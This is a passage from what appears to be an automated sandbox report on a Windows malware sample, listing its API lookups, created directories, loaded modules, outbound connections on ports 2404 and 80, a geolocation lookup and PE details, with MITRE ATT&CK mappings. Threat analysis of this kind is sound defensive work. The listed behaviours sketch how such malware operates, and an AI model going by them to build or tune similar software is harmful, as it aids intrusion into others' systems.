(UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"130014008e5acb75@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"0d000e00844b516b@Iphlpapi.DLL\"\n \"0f001000dc4b516b@Iphlpapi.DLL\"\n \"0c000d00244c516b@Iphlpapi.DLL\"\n \"140015006c4c516b@Iphlpapi.DLL\"\n \"0c000d00e04c516b@Iphlpapi.DLL\"\n \"15001600c03e516b@ADVAPI32.dll\"\n \"0e000f00703f516b@ADVAPI32.dll\"\n \"0e000f00cc3f516b@ADVAPI32.dll\"\n \"11001200b447516b@ADVAPI32.dll\"\n \"110012004848516b@ADVAPI32.dll\"\n \"120013008c48516b@ADVAPI32.dll\"\n \"12001300e448516b@ADVAPI32.dll\"\n \"14001500dc6f516b@ADVAPI32.dll\"\n \"14001500f46f516b@ADVAPI32.dll\"\n \"140015000c70516b@ADVAPI32.dll\"\n \"170018002470516b@ADVAPI32.dll\"\n \"0d000e003c70516b@ADVAPI32.dll\"\n \"110012004c70516b@ADVAPI32.dll\"\n \"110012006070516b@ADVAPI32.dll\"\n \"0d000e00f066516b@WININET.dll\"\n \"0d000e006067516b@WININET.dll\"\n \"100011009867516b@WININET.dll\"\n \"100011003c68516b@WININET.dll\"\n \"10001100a470516b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2404\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache\" Response ==> HTTP/1.1 200 OK\ndate: Wed\n 26 Mar 2025 09:13:00 GMT\nserver: Apache\ncontent-length: 961\ncontent-type: application/json; charset=utf-8\ncache-control: public\n max-age=300\naccess-control-allow-origin: * with response body ==>7B0A20202267656F706C7567696E5F72657175657374223A2236342E3132342E31322E313632222C0A20202267656F706C7567696E5F737461747573223A3230.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has an writable section named \".data\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 705f0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"KERNEL32\" at base 753b0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b480000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"RSTRTMGR\" at base 6cea0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"SSPICLI.DLL\" at base 74f00000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"RPCRT4.DLL\" at base 75490000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"KERNEL32.DLL\" at base 753b0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 772c0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a40000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 745a0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"CRYPTSP.DLL\" at base 74a80000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74810000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"ADVAPI32.DLL\" at base 759b0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f70000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"SECUR32.DLL\" at base 74da0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"SHELL32.DLL\" at base 76520000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"OLE32.DLL\" at base 763c0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"PROFAPI.DLL\" at base 75090000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70cc0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75250000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"WS2_32.DLL\" at base 772c0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"WINHTTP.DLL\" at base 71030000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"IPHLPAPI.DLL\" at base 733d0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74a30000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 71a90000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"DNSAPI.DLL\" at base 74900000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"URLMON.DLL\" at base 75f60000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"OLEAUT32.DLL\" at base 762b0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77300000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"CLBCATQ.DLL\" at base 77320000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6c9d0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"RASADHLP.DLL\" at base 71710000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"DHCPCSVC6.DLL\" at base 732e0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"DHCPCSVC.DLL\" at base 73270000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77300000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75010000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6cca0000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73340000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"COMCTL32.DLL\" at base 73f70000\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 762b0000\n 